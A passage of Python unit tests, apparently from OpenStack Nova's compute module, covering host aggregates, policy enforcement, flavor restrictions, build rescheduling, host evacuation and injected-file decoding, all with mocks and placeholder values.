self.assertEqual(len(aggr['hosts']), 1)
fake_zone2 = "another_zone"
aggr2 = self.api.create_aggregate(self.context,
'fake_aggregate2', fake_zone2)
self.assertRaises(exception.InvalidAggregateAction,
self.api.add_host_to_aggregate,
self.context, aggr2['id'], fake_host)
def test_add_host_to_aggregate_multiple(self):
# Ensure we can add multiple hosts to an aggregate.
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
for host in values[fake_zone]:
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], host)
self.assertEqual(len(aggr['hosts']), len(values[fake_zone]))
def test_add_host_to_aggregate_raise_not_found(self):
# Ensure ComputeHostNotFound is raised when adding invalid host.
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
fake_notifier.NOTIFICATIONS = []
self.assertRaises(exception.ComputeHostNotFound,
self.api.add_host_to_aggregate,
self.context, aggr['id'], 'invalid_host')
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
self.assertEqual(fake_notifier.NOTIFICATIONS[1].publisher_id,
'compute.fake-mini')
def test_remove_host_from_aggregate_active(self):
# Ensure we can remove a host from an aggregate.
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
for host in values[fake_zone]:
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], host)
host_to_remove = values[fake_zone][0]
def fake_remove_aggregate_host(*args, **kwargs):
hosts = kwargs["aggregate"]["hosts"]
self.assertNotIn(host_to_remove, hosts)
self.stubs.Set(self.api.compute_rpcapi, 'remove_aggregate_host',
fake_remove_aggregate_host)
fake_notifier.NOTIFICATIONS = []
expected = self.api.remove_host_from_aggregate(self.context,
aggr['id'],
host_to_remove)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.removehost.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.removehost.end')
self.assertEqual(len(aggr['hosts']) - 1, len(expected['hosts']))
def test_remove_host_from_aggregate_raise_not_found(self):
# Ensure ComputeHostNotFound is raised when removing invalid host.
_create_service_entries(self.context, {'fake_zone': ['fake_host']})
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
self.assertRaises(exception.ComputeHostNotFound,
self.api.remove_host_from_aggregate,
self.context, aggr['id'], 'invalid_host')
def test_aggregate_list(self):
aggregate = self.api.create_aggregate(self.context,
'fake_aggregate',
'fake_zone')
metadata = {'foo_key1': 'foo_value1',
'foo_key2': 'foo_value2'}
meta_aggregate = self.api.create_aggregate(self.context,
'fake_aggregate2',
'fake_zone2')
self.api.update_aggregate_metadata(self.context, meta_aggregate['id'],
metadata)
aggregate_list = self.api.get_aggregate_list(self.context)
self.assertIn(aggregate['id'],
map(lambda x: x['id'], aggregate_list))
self.assertIn(meta_aggregate['id'],
map(lambda x: x['id'], aggregate_list))
self.assertIn('fake_aggregate',
map(lambda x: x['name'], aggregate_list))
self.assertIn('fake_aggregate2',
map(lambda x: x['name'], aggregate_list))
self.assertIn('fake_zone',
map(lambda x: x['availability_zone'], aggregate_list))
self.assertIn('fake_zone2',
map(lambda x: x['availability_zone'], aggregate_list))
test_meta_aggregate = aggregate_list[1]
self.assertIn('foo_key1', test_meta_aggregate.get('metadata'))
self.assertIn('foo_key2', test_meta_aggregate.get('metadata'))
self.assertEquals('foo_value1',
test_meta_aggregate.get('metadata')['foo_key1'])
self.assertEquals('foo_value2',
test_meta_aggregate.get('metadata')['foo_key2'])
def test_aggregate_list_with_hosts(self):
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
host_aggregate = self.api.create_aggregate(self.context,
'fake_aggregate',
fake_zone)
self.api.add_host_to_aggregate(self.context, host_aggregate['id'],
values[fake_zone][0])
aggregate_list = self.api.get_aggregate_list(self.context)
aggregate = aggregate_list[0]
self.assertIn(values[fake_zone][0], aggregate.get('hosts'))
class ComputeAggrTestCase(BaseTestCase):
"""This is for unit coverage of aggregate-related methods
defined in nova.compute.manager.
"""
def setUp(self):
super(ComputeAggrTestCase, self).setUp()
self.context = context.get_admin_context()
values = {'name': 'test_aggr'}
az = {'availability_zone': 'test_zone'}
self.aggr = db.aggregate_create(self.context, values, metadata=az)
def test_add_aggregate_host(self):
def fake_driver_add_to_aggregate(context, aggregate, host, **_ignore):
fake_driver_add_to_aggregate.called = True
return {"foo": "bar"}
self.stubs.Set(self.compute.driver, "add_to_aggregate",
fake_driver_add_to_aggregate)
self.compute.add_aggregate_host(self.context, "host",
aggregate=jsonutils.to_primitive(self.aggr))
self.assertTrue(fake_driver_add_to_aggregate.called)
def test_remove_aggregate_host(self):
def fake_driver_remove_from_aggregate(context, aggregate, host,
**_ignore):
fake_driver_remove_from_aggregate.called = True
self.assertEqual("host", host, "host")
return {"foo": "bar"}
self.stubs.Set(self.compute.driver, "remove_from_aggregate",
fake_driver_remove_from_aggregate)
self.compute.remove_aggregate_host(self.context,
aggregate=jsonutils.to_primitive(self.aggr), host="host")
self.assertTrue(fake_driver_remove_from_aggregate.called)
def test_add_aggregate_host_passes_slave_info_to_driver(self):
def driver_add_to_aggregate(context, aggregate, host, **kwargs):
self.assertEquals(self.context, context)
self.assertEquals(aggregate['id'], self.aggr['id'])
self.assertEquals(host, "the_host")
self.assertEquals("SLAVE_INFO", kwargs.get("slave_info"))
self.stubs.Set(self.compute.driver, "add_to_aggregate",
driver_add_to_aggregate)
self.compute.add_aggregate_host(self.context, "the_host",
slave_info="SLAVE_INFO",
aggregate=jsonutils.to_primitive(self.aggr))
def test_remove_from_aggregate_passes_slave_info_to_driver(self):
def driver_remove_from_aggregate(context, aggregate, host, **kwargs):
self.assertEquals(self.context, context)
self.assertEquals(aggregate['id'], self.aggr['id'])
self.assertEquals(host, "the_host")
self.assertEquals("SLAVE_INFO", kwargs.get("slave_info"))
self.stubs.Set(self.compute.driver, "remove_from_aggregate",
driver_remove_from_aggregate)
self.compute.remove_aggregate_host(self.context,
aggregate=jsonutils.to_primitive(self.aggr), host="the_host",
slave_info="SLAVE_INFO")
class ComputePolicyTestCase(BaseTestCase):
def setUp(self):
super(ComputePolicyTestCase, self).setUp()
self.compute_api = compute.API()
def test_actions_are_prefixed(self):
self.mox.StubOutWithMock(policy, 'enforce')
nova.policy.enforce(self.context, 'compute:reboot', {})
self.mox.ReplayAll()
compute_api.check_policy(self.context, 'reboot', {})
def test_wrapped_method(self):
instance = self._create_fake_instance(params={'host': None,
'cell_name': 'foo'})
# force delete to fail
rules = {"compute:delete": [["false:false"]]}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.delete, self.context, instance)
# reset rules to allow deletion
rules = {"compute:delete": []}
self.policy.set_rules(rules)
self.compute_api.delete(self.context, self._objectify(instance))
def test_create_fail(self):
rules = {"compute:create": [["false:false"]]}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, '1', '1')
def test_create_attach_volume_fail(self):
rules = {
"compute:create": [],
"compute:create:attach_network": [["false:false"]],
"compute:create:attach_volume": [],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, '1', '1',
requested_networks='blah',
block_device_mapping='blah')
def test_create_attach_network_fail(self):
rules = {
"compute:create": [],
"compute:create:attach_network": [],
"compute:create:attach_volume": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, '1', '1',
requested_networks='blah',
block_device_mapping='blah')
def test_get_fail(self):
instance = self._create_fake_instance()
rules = {
"compute:get": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.get, self.context, instance['uuid'])
def test_get_all_fail(self):
rules = {
"compute:get_all": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.get_all, self.context)
def test_get_instance_faults(self):
instance1 = self._create_fake_instance()
instance2 = self._create_fake_instance()
instances = [instance1, instance2]
rules = {
"compute:get_instance_faults": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.get_instance_faults,
context.get_admin_context(), instances)
def test_force_host_fail(self):
rules = {"compute:create": [],
"compute:create:forced_host": [["role:fake"]],
"network:validate_networks": []}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, None, '1',
availability_zone='1:1')
def test_force_host_pass(self):
rules = {"compute:create": [],
"compute:create:forced_host": [],
"network:validate_networks": []}
self.policy.set_rules(rules)
self.compute_api.create(self.context, None, '1',
availability_zone='1:1')
class DisabledInstanceTypesTestCase(BaseTestCase):
"""
Some instance-types are marked 'disabled' which means that they will not
show up in customer-facing listings. We do, however, want those
instance-types to be available for emergency migrations and for rebuilding
of existing instances.
One legitimate use of the 'disabled' field would be when phasing out a
particular instance-type. We still want customers to be able to use an
instance that of the old type, and we want Ops to be able perform
migrations against it, but we *don't* want customers building new slices
with ths phased-out instance-type.
"""
def setUp(self):
super(DisabledInstanceTypesTestCase, self).setUp()
self.compute_api = compute.API()
self.inst_type = flavors.get_default_flavor()
def test_can_build_instance_from_visible_instance_type(self):
self.inst_type['disabled'] = False
# Assert that exception.InstanceTypeNotFound is not raised
self.compute_api.create(self.context, self.inst_type,
image_href='some-fake-image')
def test_cannot_build_instance_from_disabled_instance_type(self):
self.inst_type['disabled'] = True
self.assertRaises(exception.InstanceTypeNotFound,
self.compute_api.create, self.context, self.inst_type, None)
def test_can_resize_to_visible_instance_type(self):
instance = self._create_fake_instance_obj()
orig_get_flavor_by_flavor_id =\
flavors.get_flavor_by_flavor_id
def fake_get_flavor_by_flavor_id(flavor_id, ctxt=None,
read_deleted="yes"):
instance_type = orig_get_flavor_by_flavor_id(flavor_id,
ctxt,
read_deleted)
instance_type['disabled'] = False
return instance_type
self.stubs.Set(flavors, 'get_flavor_by_flavor_id',
fake_get_flavor_by_flavor_id)
# FIXME(sirp): for legacy this raises FlavorNotFound instead of
# InstanceTypeNotFound; we should eventually make it raise
# InstanceTypeNotFound for consistency.
self._stub_migrate_server()
self.compute_api.resize(self.context, instance, '4')
def test_cannot_resize_to_disabled_instance_type(self):
instance = self._create_fake_instance_obj()
orig_get_flavor_by_flavor_id = \
flavors.get_flavor_by_flavor_id
def fake_get_flavor_by_flavor_id(flavor_id, ctxt=None,
read_deleted="yes"):
instance_type = orig_get_flavor_by_flavor_id(flavor_id,
ctxt,
read_deleted)
instance_type['disabled'] = True
return instance_type
self.stubs.Set(flavors, 'get_flavor_by_flavor_id',
fake_get_flavor_by_flavor_id)
# FIXME(sirp): for legacy this raises FlavorNotFound instead of
# InstanceTypeNot; we should eventually make it raise
# InstanceTypeNotFound for consistency.
self.assertRaises(exception.FlavorNotFound,
self.compute_api.resize, self.context, instance, '4')
class ComputeReschedulingTestCase(BaseTestCase):
"""Tests re-scheduling logic for new build requests."""
def setUp(self):
super(ComputeReschedulingTestCase, self).setUp()
self.expected_task_state = task_states.SCHEDULING
def fake_update(*args, **kwargs):
self.updated_task_state = kwargs.get('task_state')
self.stubs.Set(self.compute, '_instance_update', fake_update)
def _reschedule(self, request_spec=None, filter_properties=None,
exc_info=None):
if not filter_properties:
filter_properties = {}
instance_uuid = "12-34-56-78-90"
admin_password = None
injected_files = None
requested_networks = None
is_first_time = False
scheduler_method = self.compute.scheduler_rpcapi.run_instance
method_args = (request_spec, admin_password, injected_files,
requested_networks, is_first_time, filter_properties)
return self.compute._reschedule(self.context, request_spec,
filter_properties, instance_uuid, scheduler_method,
method_args, self.expected_task_state, exc_info=exc_info)
def test_reschedule_no_filter_properties(self):
# no filter_properties will disable re-scheduling.
self.assertFalse(self._reschedule())
def test_reschedule_no_retry_info(self):
# no retry info will also disable re-scheduling.
filter_properties = {}
self.assertFalse(self._reschedule(filter_properties=filter_properties))
def test_reschedule_no_request_spec(self):
# no request spec will also disable re-scheduling.
retry = dict(num_attempts=1)
filter_properties = dict(retry=retry)
self.assertFalse(self._reschedule(filter_properties=filter_properties))
def test_reschedule_success(self):
retry = dict(num_attempts=1)
filter_properties = dict(retry=retry)
request_spec = {'instance_uuids': ['foo', 'bar']}
try:
raise test.TestingException("just need an exception")
except test.TestingException:
exc_info = sys.exc_info()
exc_str = traceback.format_exception(*exc_info)
self.assertTrue(self._reschedule(filter_properties=filter_properties,
request_spec=request_spec, exc_info=exc_info))
self.assertEqual(1, len(request_spec['instance_uuids']))
self.assertEqual(self.updated_task_state, self.expected_task_state)
self.assertEqual(exc_str, filter_properties['retry']['exc'])
class ComputeReschedulingResizeTestCase(ComputeReschedulingTestCase):
"""Test re-scheduling logic for prep_resize requests."""
def setUp(self):
super(ComputeReschedulingResizeTestCase, self).setUp()
self.expected_task_state = task_states.RESIZE_PREP
def _reschedule(self, request_spec=None, filter_properties=None,
exc_info=None):
if not filter_properties:
filter_properties = {}
instance_uuid = "12-34-56-78-90"
instance = fake_instance.fake_db_instance(uuid=instance_uuid)
instance = self._objectify(instance)
instance_type = {}
image = None
reservations = None
scheduler_method = self.compute.scheduler_rpcapi.prep_resize
method_args = (instance, instance_type, image, request_spec,
filter_properties, reservations)
return self.compute._reschedule(self.context, request_spec,
filter_properties, instance_uuid, scheduler_method,
method_args, self.expected_task_state, exc_info=exc_info)
class InnerTestingException(Exception):
pass
class ComputeRescheduleOrErrorTestCase(BaseTestCase):
"""Test logic and exception handling around rescheduling or re-raising
original exceptions when builds fail.
"""
def setUp(self):
super(ComputeRescheduleOrErrorTestCase, self).setUp()
self.instance = self._create_fake_instance()
def test_reschedule_or_error_called(self):
"""Basic sanity check to make sure _reschedule_or_error is called
when a build fails.
"""
self.mox.StubOutWithMock(self.compute, '_spawn')
self.mox.StubOutWithMock(self.compute, '_reschedule_or_error')
self.compute._spawn(mox.IgnoreArg(), self.instance, mox.IgnoreArg(),
[], mox.IgnoreArg(), [], None, set_access_ip=False).AndRaise(
test.TestingException("BuildError"))
self.compute._reschedule_or_error(mox.IgnoreArg(), self.instance,
mox.IgnoreArg(), None, None, None,
False, None, {}, [], False).AndReturn(True)
self.mox.ReplayAll()
self.compute._run_instance(self.context, None, {}, None, None, None,
False, None, self.instance, False)
def test_shutdown_instance_fail(self):
"""Test shutdown instance failing before re-scheduling logic can even
run.
"""
instance_uuid = self.instance['uuid']
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
compute_utils.add_instance_fault_from_exc(self.context,
self.compute.conductor_api,
self.instance, exc_info[0], exc_info=exc_info)
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(InnerTestingException("Error"))
self.compute._log_original_error(exc_info, instance_uuid)
self.mox.ReplayAll()
# should raise the deallocation exception, not the original build
# error:
self.assertRaises(InnerTestingException,
self.compute._reschedule_or_error, self.context,
self.instance, exc_info, None, None, None, False, None, {})
def test_reschedule_fail(self):
# Test handling of exception from _reschedule.
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
instance_uuid = self.instance['uuid']
method_args = (None, None, None, None, False, {})
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
self.mox.StubOutWithMock(self.compute, '_cleanup_volumes')
self.mox.StubOutWithMock(self.compute, '_reschedule')
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg())
self.compute._cleanup_volumes(self.context, instance_uuid,
mox.IgnoreArg())
self.compute._reschedule(self.context, None, instance_uuid,
{}, self.compute.scheduler_rpcapi.run_instance,
method_args, task_states.SCHEDULING, exc_info).AndRaise(
InnerTestingException("Inner"))
self.mox.ReplayAll()
self.assertFalse(self.compute._reschedule_or_error(self.context,
self.instance, exc_info, None, None, None, False, None, {}))
def test_reschedule_false(self):
# Test not-rescheduling, but no nested exception.
instance_uuid = self.instance['uuid']
method_args = (None, None, None, None, False, {})
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
self.mox.StubOutWithMock(self.compute, '_cleanup_volumes')
self.mox.StubOutWithMock(self.compute, '_reschedule')
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
compute_utils.add_instance_fault_from_exc(self.context,
self.compute.conductor_api,
self.instance, exc_info[0], exc_info=exc_info)
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg())
self.compute._cleanup_volumes(self.context, instance_uuid,
mox.IgnoreArg())
self.compute._reschedule(self.context, None, {}, instance_uuid,
self.compute.scheduler_rpcapi.run_instance, method_args,
task_states.SCHEDULING, exc_info).AndReturn(False)
self.mox.ReplayAll()
# re-scheduling is False, the original build error should be
# raised here:
self.assertFalse(self.compute._reschedule_or_error(self.context,
self.instance, exc_info, None, None, None, False, None, {}))
def test_reschedule_true(self):
# Test behavior when re-scheduling happens.
instance_uuid = self.instance['uuid']
method_args = (None, None, None, None, False, {})
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
self.mox.StubOutWithMock(self.compute, '_cleanup_volumes')
self.mox.StubOutWithMock(self.compute, '_reschedule')
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
compute_utils.add_instance_fault_from_exc(self.context,
self.compute.conductor_api,
self.instance, exc_info[0], exc_info=exc_info)
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg())
self.compute._cleanup_volumes(self.context, instance_uuid,
mox.IgnoreArg())
self.compute._reschedule(self.context, None, {}, instance_uuid,
self.compute.scheduler_rpcapi.run_instance,
method_args, task_states.SCHEDULING, exc_info).AndReturn(
True)
self.compute._log_original_error(exc_info, instance_uuid)
self.mox.ReplayAll()
# re-scheduling is True, original error is logged, but nothing
# is raised:
self.compute._reschedule_or_error(self.context, self.instance,
exc_info, None, None, None, False, None, {})
def test_no_reschedule_on_delete_during_spawn(self):
# instance should not be rescheduled if instance is deleted
# during the build
self.mox.StubOutWithMock(self.compute, '_spawn')
self.mox.StubOutWithMock(self.compute, '_reschedule_or_error')
exc = exception.UnexpectedTaskStateError(expected=task_states.SPAWNING,
actual=task_states.DELETING)
self.compute._spawn(mox.IgnoreArg(), self.instance, mox.IgnoreArg(),
mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg(), set_access_ip=False).AndRaise(exc)
self.mox.ReplayAll()
# test succeeds if mocked method '_reschedule_or_error' is not
# called.
self.compute._run_instance(self.context, None, {}, None, None, None,
False, None, self.instance, False)
def test_no_reschedule_on_unexpected_task_state(self):
# instance shouldn't be rescheduled if unexpected task state arises.
# the exception should get reraised.
self.mox.StubOutWithMock(self.compute, '_spawn')
self.mox.StubOutWithMock(self.compute, '_reschedule_or_error')
exc = exception.UnexpectedTaskStateError(expected=task_states.SPAWNING,
actual=task_states.SCHEDULING)
self.compute._spawn(mox.IgnoreArg(), self.instance, mox.IgnoreArg(),
mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg(), set_access_ip=False).AndRaise(exc)
self.mox.ReplayAll()
self.assertRaises(exception.UnexpectedTaskStateError,
self.compute._run_instance, self.context, None, {}, None, None,
None, False, None, self.instance, False)
class ComputeRescheduleResizeOrReraiseTestCase(BaseTestCase):
"""Test logic and exception handling around rescheduling prep resize
requests
"""
def setUp(self):
super(ComputeRescheduleResizeOrReraiseTestCase, self).setUp()
self.instance = self._create_fake_instance()
self.instance_uuid = self.instance['uuid']
self.instance_type = flavors.get_flavor_by_name(
"m1.tiny")
def test_reschedule_resize_or_reraise_called(self):
"""Verify the rescheduling logic gets called when there is an error
during prep_resize.
"""
inst_obj = self._create_fake_instance_obj()
self.mox.StubOutWithMock(self.compute.db, 'migration_create')
self.mox.StubOutWithMock(self.compute, '_reschedule_resize_or_reraise')
self.compute.db.migration_create(mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(test.TestingException("Original"))
self.compute._reschedule_resize_or_reraise(mox.IgnoreArg(), None,
inst_obj, mox.IgnoreArg(), self.instance_type, None, None,
None)
self.mox.ReplayAll()
self.compute.prep_resize(self.context, image=None,
instance=inst_obj,
instance_type=self.instance_type)
def test_reschedule_fails_with_exception(self):
"""Original exception should be raised if the _reschedule method
raises another exception
"""
instance = self._create_fake_instance_obj()
method_args = (None, instance, self.instance_type, None, None,
None)
self.mox.StubOutWithMock(self.compute, "_reschedule")
self.compute._reschedule(
self.context, None, None, instance.uuid,
self.compute.scheduler_rpcapi.prep_resize, method_args,
task_states.RESIZE_PREP).AndRaise(
InnerTestingException("Inner"))
self.mox.ReplayAll()
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
self.assertRaises(test.TestingException,
self.compute._reschedule_resize_or_reraise, self.context,
None, instance, exc_info, self.instance_type, None,
{}, {})
def test_reschedule_false(self):
"""Original exception should be raised if the resize is not
rescheduled.
"""
instance = self._create_fake_instance_obj()
method_args = (None, instance, self.instance_type, None, None, None)
self.mox.StubOutWithMock(self.compute, "_reschedule")
self.compute._reschedule(
self.context, None, None, instance.uuid,
self.compute.scheduler_rpcapi.prep_resize, method_args,
task_states.RESIZE_PREP).AndReturn(False)
self.mox.ReplayAll()
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
self.assertRaises(test.TestingException,
self.compute._reschedule_resize_or_reraise, self.context,
None, instance, exc_info, self.instance_type, None,
{}, {})
def test_reschedule_true(self):
# If rescheduled, the original resize exception should be logged.
instance = self._create_fake_instance_obj()
instance_p = obj_base.obj_to_primitive(instance)
method_args = (instance_p, self.instance_type, None, {}, {}, None)
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
self.mox.StubOutWithMock(self.compute, "_reschedule")
self.mox.StubOutWithMock(self.compute, "_log_original_error")
self.compute._reschedule(self.context, {}, {},
instance.uuid,
self.compute.scheduler_rpcapi.prep_resize, method_args,
task_states.RESIZE_PREP, exc_info).AndReturn(True)
self.compute._log_original_error(exc_info, instance.uuid)
self.mox.ReplayAll()
self.compute._reschedule_resize_or_reraise(self.context, None,
instance, exc_info, self.instance_type, None, {}, {})
class ComputeInactiveImageTestCase(BaseTestCase):
def setUp(self):
super(ComputeInactiveImageTestCase, self).setUp()
def fake_show(meh, context, id):
return {'id': id, 'min_disk': None, 'min_ram': None,
'name': 'fake_name',
'status': 'deleted',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id',
'something_else': 'meow'}}
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'show', fake_show)
self.compute_api = compute.API()
def test_create_instance_with_deleted_image(self):
# Make sure we can't start an instance with a deleted image.
inst_type = flavors.get_flavor_by_name('m1.tiny')
self.assertRaises(exception.ImageNotActive,
self.compute_api.create,
self.context, inst_type, 'fake-image-uuid')
class EvacuateHostTestCase(BaseTestCase):
def setUp(self):
super(EvacuateHostTestCase, self).setUp()
self.inst_ref = jsonutils.to_primitive(self._create_fake_instance
({'host': 'fake_host_2',
'node': 'fakenode2'}))
db.instance_update(self.context, self.inst_ref['uuid'],
{"task_state": task_states.REBUILDING})
def tearDown(self):
db.instance_destroy(self.context, self.inst_ref['uuid'])
super(EvacuateHostTestCase, self).tearDown()
def _rebuild(self, on_shared_storage=True):
def fake(cls, ctxt, instance, *args, **kwargs):
pass
self.stubs.Set(network_api.API, 'setup_networks_on_host', fake)
orig_image_ref = None
image_ref = None
injected_files = None
self.compute.rebuild_instance(
self.context, self.inst_ref, orig_image_ref, image_ref,
injected_files, 'newpass', recreate=True,
on_shared_storage=on_shared_storage)
def test_rebuild_on_host_updated_target(self):
"""Confirm evacuate scenario updates host and node."""
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
def fake_get_compute_info(context, host):
self.assertTrue(context.is_admin)
self.assertEquals('fake-mini', host)
return {'hypervisor_hostname': self.rt.nodename}
self.stubs.Set(self.compute, '_get_compute_info',
fake_get_compute_info)
self.mox.ReplayAll()
self._rebuild()
# Should be on destination host
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['host'], self.compute.host)
self.assertEqual(NODENAME, instance['node'])
def test_rebuild_on_host_updated_target_node_not_found(self):
"""Confirm evacuate scenario where compute_node isn't found."""
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
def fake_get_compute_info(context, host):
raise exception.NotFound(_("Host %s not found") % host)
self.stubs.Set(self.compute, '_get_compute_info',
fake_get_compute_info)
self.mox.ReplayAll()
self._rebuild()
# Should be on destination host
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['host'], self.compute.host)
self.assertIsNone(instance['node'])
def test_rebuild_with_instance_in_stopped_state(self):
"""Confirm evacuate scenario updates vm_state to stopped
if instance is in stopped state
"""
#Initialize the VM to stopped state
db.instance_update(self.context, self.inst_ref['uuid'],
{"vm_state": vm_states.STOPPED})
self.inst_ref['vm_state'] = vm_states.STOPPED
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self._rebuild()
#Check the vm state is reset to stopped
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['vm_state'], vm_states.STOPPED)
def test_rebuild_with_wrong_shared_storage(self):
"""Confirm evacuate scenario does not update host."""
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self.assertRaises(exception.InvalidSharedStorage,
lambda: self._rebuild(on_shared_storage=False))
# Should remain on original host
instance = db.instance_get(self.context, self.inst_ref['id'])
self.assertEqual(instance['host'], 'fake_host_2')
def test_rebuild_on_host_with_volumes(self):
"""Confirm evacuate scenario reconnects volumes."""
values = {'instance_uuid': self.inst_ref['uuid'],
'source_type': 'volume',
'device_name': '/dev/vdc',
'delete_on_termination': False,
'volume_id': 'fake_volume_id'}
db.block_device_mapping_create(self.context, values)
def fake_volume_get(self, context, volume):
return {'id': 'fake_volume_id'}
self.stubs.Set(cinder.API, "get", fake_volume_get)
# Stub out and record whether it gets detached
result = {"detached": False}
def fake_detach(self, context, volume):
result["detached"] = volume["id"] == 'fake_volume_id'
self.stubs.Set(cinder.API, "detach", fake_detach)
def fake_terminate_connection(self, context, volume, connector):
return {}
self.stubs.Set(cinder.API, "terminate_connection",
fake_terminate_connection)
# make sure volumes attach, detach are called
self.mox.StubOutWithMock(self.compute.volume_api, 'detach')
self.compute.volume_api.detach(mox.IsA(self.context), mox.IgnoreArg())
self.mox.StubOutWithMock(self.compute, '_prep_block_device')
self.compute._prep_block_device(mox.IsA(self.context),
mox.IsA(self.inst_ref),
mox.IgnoreArg())
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self._rebuild()
# cleanup
for bdms in db.block_device_mapping_get_all_by_instance(
self.context, self.inst_ref['uuid']):
db.block_device_mapping_destroy(self.context, bdms['id'])
def test_rebuild_on_host_with_shared_storage(self):
"""Confirm evacuate scenario on shared storage."""
self.mox.StubOutWithMock(self.compute.driver, 'spawn')
self.compute.driver.spawn(mox.IsA(self.context),
mox.IsA(self.inst_ref), {}, mox.IgnoreArg(), 'newpass',
network_info=mox.IgnoreArg(),
block_device_info=mox.IgnoreArg())
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.mox.ReplayAll()
self._rebuild()
def test_rebuild_on_host_without_shared_storage(self):
"""Confirm evacuate scenario without shared storage
(rebuild from image)
"""
fake_image = {'id': 1,
'name': 'fake_name',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id'}}
self.mox.StubOutWithMock(self.compute.driver, 'spawn')
self.compute.driver.spawn(mox.IsA(self.context),
mox.IsA(self.inst_ref), mox.IsA(fake_image), mox.IgnoreArg(),
mox.IsA('newpass'), network_info=mox.IgnoreArg(),
block_device_info=mox.IgnoreArg())
self.stubs.Set(self.compute.driver, 'instance_on_disk',
lambda x: False)
self.mox.ReplayAll()
self._rebuild(on_shared_storage=False)
def test_rebuild_on_host_instance_exists(self):
"""Rebuild if instance exists raises an exception."""
db.instance_update(self.context, self.inst_ref['uuid'],
{"task_state": task_states.SCHEDULING})
self.compute.run_instance(self.context, instance=self.inst_ref)
self.stubs.Set(self.compute.driver, 'instance_on_disk', lambda x: True)
self.assertRaises(exception.InstanceExists,
lambda: self._rebuild(on_shared_storage=True))
def test_driver_doesnt_support_recreate(self):
with utils.temporary_mutation(self.compute.driver.capabilities,
supports_recreate=False):
self.stubs.Set(self.compute.driver, 'instance_on_disk',
lambda x: True)
self.assertRaises(exception.InstanceRecreateNotSupported,
lambda: self._rebuild(on_shared_storage=True))
class ComputeInjectedFilesTestCase(BaseTestCase):
# Test that running instances with injected_files decodes files correctly
def setUp(self):
super(ComputeInjectedFilesTestCase, self).setUp()
self.instance = self._create_fake_instance()
self.stubs.Set(self.compute.driver, 'spawn', self._spawn)
def _spawn(self, context, instance, image_meta, injected_files,
admin_password, nw_info, block_device_info, db_api=None):
self.assertEqual(self.expected, injected_files)
def _test(self, injected_files, decoded_files):
self.expected = decoded_files
self.compute.run_instance(self.context, self.instance,
injected_files=injected_files)
def test_injected_none(self):
# test an input of None for injected_files
self._test(None, [])
def test_injected_empty(self):
# test an input of [] for injected_files
self._test([], [])
def test_injected_success(self):
# test with valid b64 encoded content.
injected_files = [
('/a/b/c', base64.b64encode('foobarbaz')),
('/d/e/f', base64.b64encode('seespotrun')),
]
decoded_files = [
('/a/b/c', 'foobarbaz'),
('/d/e/f', 'seespotrun'),
]
self._test(injected_files, decoded_files)
